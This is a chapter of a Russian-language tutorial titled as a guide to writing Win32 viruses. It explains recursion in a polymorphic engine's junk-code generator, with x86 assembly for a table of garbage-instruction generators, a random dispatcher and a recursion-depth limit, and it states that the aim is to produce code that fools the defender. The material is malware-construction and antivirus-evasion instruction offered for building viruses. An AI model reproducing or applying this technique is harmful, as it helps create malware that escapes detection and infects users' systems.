Путеводитель по написанию вирусов под Win32


Рекурсивность


Это один из важнейших моментов вашего полиморфного движка. Рекурсия должна иметь ограничение, но в зависимости от этого ограничения отлаживать код будет гораздо труднее (если лимит достаточно высок). Давайте представим, что у нас есть таблица со всеми смещениями всех генераторов мусора:

PolyTable: dd offset (GenerateMOV) dd offset (GenerateCALL) dd offset (GeneratteJMP) [...] EndPolyTable:

И представьте, что у вас есть следующая процедура для выбора между ними:

GenGarbage: mov eax,EndPolyTable-PolyTable call r_range lea ebx,[ebp+PolyTable] mov eax,[ebx+eax*4] add eax,ebp call eax ret

Представьте, что внутри процедуры 'GetGarbage' вызываются инструкции, генерирующие вызовы, а внутри них снова вызывается 'GenGarbage', а внутри нее снова вызывается 'GenerateCALL' и снова, и снова (в зависимости от вашего ГСЧ), поэтом у вас будут CALL'ы внутри CALL'ов внутри CALL'ов... Я сказал ранее, что эта штука с ограничением нужна была для того, чтобы избежать проблем со скоростью, но это можно легко решить с помощью новой процедуры 'GenGarbage':

GenGarbage: inc byte ptr [ebp+recursion_level] cmp byte ptr [ebp+recursion_level],05 ; <- 5 - это уровень jae GarbageExit ; рекурсии

mov eax,EndPolyTable-PolyTable call r_range lea ebx,[ebp+PolyTable] mov eax,[ebx+eax*4] add eax,ebp call eax

GarbageExit: dec byte ptr [ebp+recursion_level] ret

Таким образом, наш движок сможет сгенерировать огромное количество одурачивающего противника кода, полного вызовов и всего в таком роде ;). Конечно, это также применимо к PUSH и POP :).




Начало  Назад  Вперед



Книжный магазин